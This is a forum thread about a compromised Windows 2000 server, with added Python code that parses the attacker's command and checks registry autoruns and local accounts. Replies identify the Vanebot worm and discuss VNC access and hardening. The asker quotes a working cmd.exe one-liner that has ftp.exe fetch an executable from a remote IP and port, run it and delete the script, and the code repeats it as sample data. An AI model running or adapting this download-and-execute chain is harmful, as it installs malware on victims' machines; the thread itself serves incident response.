Compromised Windows 2000 Server?

Hi,

I logged into a Win2k Server in a remote office this morning and was greeted by two FTP DOS screens with the following in them:

83.70.16.16 Microsoft FTP
get 84785_redworld2.exe etc. etc.

Then there is some reference to 'Lizard Welcomes You' after FTP login.


This was in Start - Run:

cmd /c echo OPEN 83.70.16.16 29212>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

It certainly appears that the server has been accessed from an external source. We use a Sonicwall Firewall, Server is fully patched. Can anyone shed some light on this please?



spower22 Asked:
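Added example, not part of the original thread: a small Python parser for the kind of command the asker found in Start > Run. It splits the cmd.exe chain on '&', pulls the FTP script back out of the echo redirects, and reports the indicators (remote host and port, the script file written, the file fetched, the payload executed, whether the script was deleted afterwards). It flags an entry only when it forms a complete write-script / fetch / execute chain, so benign Run history is not reported. The RunMRU list is constructed for the example; the first entry is the command quoted above, the other two are benign fillers. Helper and regex names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample of Start -> Run (RunMRU) history. The first entry is the
# exact command from the original post; the other two are benign fillers.
RUN_MRU_SAMPLE = [
    "cmd /c echo OPEN 83.70.16.16 29212>x&echo GET 84785_redworld2.exe>>x"
    "&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit",
    "notepad.exe",
    "cmd /k ipconfig /all",
]

CMD_WRAPPER = re.compile(r'^\s*cmd(?:\.exe)?\s+/[ck]\s+', re.IGNORECASE)
ECHO_REDIRECT = re.compile(r'^echo\s+(?P<body>.*?)\s*>{1,2}\s*(?P<file>\S+)$', re.IGNORECASE)
FTP_SCRIPT = re.compile(r'^ftp(?:\.exe)?\b.*?-s:(?P<file>\S+)', re.IGNORECASE)
FTP_OPEN = re.compile(r'^open\s+(?P<host>\S+)(?:\s+(?P<port>\d+))?\s*$', re.IGNORECASE)
FTP_GET = re.compile(r'^m?get\s+(?P<file>\S+)', re.IGNORECASE)
EXEC_EXT = ('.exe', '.com', '.bat', '.cmd', '.scr', '.pif')


@dataclass
class FtpDropper:
    raw: str
    host: Optional[str] = None
    port: int = 21                      # ftp.exe default when OPEN gives no port
    script_file: Optional[str] = None   # file the echo lines are written to
    ftp_script: Optional[str] = None    # file passed to ftp -s:
    fetched: List[str] = field(default_factory=list)
    executed: List[str] = field(default_factory=list)
    cleans_up: bool = False

    def is_complete(self) -> bool:
        """True only for a full write-script / fetch / execute chain."""
        return (self.host is not None
                and self.script_file is not None
                and self.ftp_script == self.script_file
                and bool(self.fetched)
                and bool(self.executed))

    def indicators(self) -> List[str]:
        """Network and file indicators worth blocking or hunting for."""
        out = []
        if self.host:
            out.append(f"{self.host}:{self.port}")
        out.extend(self.fetched)
        return out


def parse_ftp_dropper(command: str) -> FtpDropper:
    d = FtpDropper(raw=command)
    body = CMD_WRAPPER.sub('', command, count=1)
    # cmd.exe runs '&'-separated commands in sequence; none here are quoted
    segments = [s.strip() for s in body.split('&') if s.strip()]
    script_lines: List[str] = []
    for seg in segments:
        m = ECHO_REDIRECT.match(seg)
        if m:                                   # echo ...>x  builds the script
            d.script_file = m.group('file')
            script_lines.append(m.group('body'))
            continue
        m = FTP_SCRIPT.match(seg)
        if m:                                   # ftp -n -s:x  runs it
            d.ftp_script = m.group('file')
            continue
        token = seg.split()[0]
        if token.lower() == 'del':              # del x  removes the script
            d.cleans_up = True
        elif token.lower().endswith(EXEC_EXT):  # bare payload name runs it
            d.executed.append(token)
    for line in script_lines:                   # now read the FTP script itself
        m = FTP_OPEN.match(line)
        if m:
            d.host = m.group('host')
            if m.group('port'):
                d.port = int(m.group('port'))
            continue
        m = FTP_GET.match(line)
        if m:
            d.fetched.append(m.group('file'))
    return d


def scan_run_history(entries: List[str]) -> List[Tuple[str, FtpDropper]]:
    """Return only entries that form a complete FTP download-and-execute chain."""
    hits = []
    for entry in entries:
        d = parse_ftp_dropper(entry)
        if d.is_complete():
            hits.append((entry, d))
    return hits


if __name__ == "__main__":
    for entry, d in scan_run_history(RUN_MRU_SAMPLE):
        print("dropper:", entry)
        print("  indicators:", ", ".join(d.indicators()))
        print("  executed:", d.executed, "cleanup:", d.cleans_up)
```

The same parser works on any RunMRU, scheduled-task or process-command-line export where this one-liner idiom shows up; the host:port pair is what to look for in firewall logs, and the fetched file name is what to search for on disk and in autostart locations.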
mugman21 Commented:
I'm guessing someone in the office downloaded something nasty, or opened an email attachment. This would have to be the case... Firewalls block inbound traffic, but allow it if outbound preceded it.

Is this a webserver, or is this a fileserver or something that is local only to your company's internal network?

If that was in Run, then several things come to mind. First, internal attack - but I doubt it. Second thought, you obviously have some sort of remote management software running, someone obviously got the pass and username. However you got in remotely, they took the same path.

If you're running VNC, there is a zero-day in it. The company can't seem to locate it, I've yet to find it, but someone has. I had a box running the newest version with all patches and fixes, everything configured properly. Some bastard still got in....

VNC here?????

m.

PowerIT Commented:
You captured a worm. Are people surfing or IM'ing on the server itself?

W32/Vanebot-M is a worm for the Windows platform. W32/Vanebot-M also contains IRC backdoor Trojan functionality which allows a remote intruder to gain access and control over the computer.

W32/Vanebot-M spreads:
to computers vulnerable to common exploits, including SRVSVC (MS06-040)
to MSSQL servers protected by weak passwords
to network shares
via MSN Messenger
via Yahoo Instant Messenger

W32/Vanebot-M may spread with the filename redworld.exe, redworld2.exe or <random numbers>_redworld2.exe.


J.
PowerIT Commented:
As it also spreads through shares and weak SQL-server passwords, it could have entered through a client PC also.
Depending on how well all your rights are set up it can be from an admin box, but also from a normal client.

J.
PowerIT Commented:
Like mugman said: it could also have been installed manually through another exploit. His VNC vulnerability is an example, but there are tons of others.
Hope you can clean this out.

J.
Machin__Shin Commented:
Don't forget to check the built-in user accounts for new admin accounts like qq$ or such. I had something similar in the end I blocked all non-essential outbound traffic from the server and restricted everything by IP address/range. Range being within the country I am in for web based remote stuff for end users. Was able to remove all the traces in the end and haven't heard bo-peep from it since in terms of problems.
mugman21 Commented:
The reason I specified the remote software or someone on the inside (i.e. pissed off employee) is this: the string left in the RUN's cache. Worms and viruses shell themselves or use some other programmatic technique to launch their payload. If someone got in through remote admin, they would navigate through the system as if they were sitting in front of it (view of the screen), thus, RUN's command cache is left.

m.
expexchuser Commented:
Looks like you've made a friend in Dublin, me lad...
http://www.dnsstuff.com/tools/whois.ch?ip=83.70.16.16
Machin__Shin Commented:
Don't be silly it's probably some poor zombie computer bwaaaaah. On a serious note use your antivirus to clean up the executables and close up your firewall to be limited by IP for remote access. Then check for traces in the Services, Registry start up locations, filter drivers and AD OU's. Of course patch up your rig.
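Added example, not part of the original thread: Python triage helpers for the two checks Machin__Shin recommends above (new local accounts such as qq$, and traces in the registry startup locations), run offline over exported text rather than on the box itself. The Regedit export and the "net user" output are constructed for the example (the hostname SRV01, the value names and the paths are invented; only the dropped file names redworld.exe, redworld2.exe and <numbers>_redworld2.exe come from the thread), and the baseline account list stands in for whatever the server had before the incident.

```python
import re
from typing import Dict, List, Set, Tuple

# File-name indicator from the thread: the worm drops redworld.exe, redworld2.exe
# or <random numbers>_redworld2.exe.
PAYLOAD_NAME = re.compile(r'(?:\d+_redworld2|redworld2?)\.exe', re.IGNORECASE)

# Constructed sample of a Regedit 5 export of the Win2k autostart keys. Value
# names and paths are invented for this example; only the payload names come
# from the thread.
REG_EXPORT_SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AVAgent"="C:\\Program Files\\AV\\avagent.exe"
"Microsoft Update"="C:\\WINNT\\system32\\84785_redworld2.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"winupd"="C:\\WINNT\\system32\\redworld.exe -s"
'''

# Constructed sample of "net user" output on the server; qq$ is the kind of
# added account the thread warns about.
NET_USER_SAMPLE = r'''User accounts for \\SRV01

-------------------------------------------------------------------------------
Administrator            Guest                    IUSR_SRV01
IWAM_SRV01               qq$                      TsInternetUser
The command completed successfully.
'''

# Accounts this (hypothetical) server was known to have before the incident.
BASELINE_ACCOUNTS = {"Administrator", "Guest", "IUSR_SRV01", "IWAM_SRV01", "TsInternetUser"}

REG_KEY = re.compile(r'^\[(?P<key>[^\]]+)\]\s*$')
REG_VALUE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"="(?P<data>(?:[^"\\]|\\.)*)"\s*$')


def _unescape(s: str) -> str:
    """Undo Regedit's backslash escaping of backslash and quote in REG_SZ data."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Map each exported key to its REG_SZ name/data pairs (other types skipped)."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        m = REG_KEY.match(line)
        if m:
            current = m.group('key')
            keys[current] = {}
            continue
        m = REG_VALUE.match(line)
        if m and current is not None:
            keys[current][_unescape(m.group('name'))] = _unescape(m.group('data'))
    return keys


def suspicious_autoruns(text: str) -> List[Tuple[str, str, str]]:
    """(key, value name, command) for every autostart entry naming the payload."""
    hits = []
    for key, values in parse_reg_export(text).items():
        for name, data in values.items():
            if PAYLOAD_NAME.search(data):
                hits.append((key, name, data))
    return hits


def parse_net_user(text: str) -> Set[str]:
    """Account names from 'net user' output (columns separated by 2+ spaces)."""
    names: Set[str] = set()
    in_table = False
    for line in text.splitlines():
        if line.startswith('---'):
            in_table = True
            continue
        if line.startswith('The command completed'):
            break
        if in_table and line.strip():
            names.update(re.split(r'\s{2,}', line.strip()))
    return names


def unexpected_accounts(text: str, baseline: Set[str]) -> Set[str]:
    """Accounts present now that were not in the pre-incident baseline."""
    return parse_net_user(text) - baseline


if __name__ == "__main__":
    for key, name, cmd in suspicious_autoruns(REG_EXPORT_SAMPLE):
        print(f"autorun {key}\\{name} -> {cmd}")
    print("unexpected accounts:", unexpected_accounts(NET_USER_SAMPLE, BASELINE_ACCOUNTS))
```

Export the Run, RunOnce and RunServices keys (and HKCU equivalents) with regedit /e or reg export, capture net user output, and feed both files to these functions; anything the payload regex hits, or any account outside the baseline, is something to remove and investigate.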
mugman21 Commented:
Machin, anti virus is worthless most of the time. The OP has already stated he is running with full patches and since this is a corporate machine, I'm pretty damn sure it already has AV installed and the on-access check failed. Why would an on-access check fail? Here's a concept: I can write viruses all day long and no AV product will pick them up until they see the evilness I've created... They have to see the work before they can generate signatures; bloodhound tech sucks.

What makes you think he didn't have a root kit installed?

Come on now.....

m.
Machin__Shin Commented:
Sounds like you use Symantec..... I did a scan with a fully heuristic enabled Symantec with an on-demand scan. It picked up 3 of the things that the hacker used. I used NOD32 with full heuristics enabled and it picked up 43. And quite a few antivirus packages claim that they scan for rootkits as well.

But yeah I know what you mean. All depends on what the person used and how far the OP was able to intercede. From the looks of it they used some pretty generic stuff though, like they are only a script kiddie if they are downloading stuff that has already been labelled by Symantec itself. Doesn't look like custom written tools.
mugman21 Commented:
From my experience with the little VNC problem; I suppose that is still fresh in my mind.

And no, I don't use Symantec, I'm whitelisting with my very own beta 2.... :-)

m.
Machin__Shin Commented:
I wish the author would actually comment on what type of remote client they used. I also have encountered the VNC problem.

Good on you and good luck ^_^, is it written in assembly? Personally I think that you answered the question with the first post. I'm just chucking in my two cents. But if I get a couple of points chucked my way I would be happy.
mugman21 Commented:
I have a little assembler in a SHA-1 function, mostly C though. Working to port parts to Delphi. I have a couple DLLs in VB too. It's working, still need to overhaul it, need more consistency in language/tools used. I need to get away from the assembler though....
spower22 (Author) Commented:
Thanks for all your comments, I've secured VNC access on the firewall to only accept calls from my static IP and all seems ok now. Again, thanks for the responses.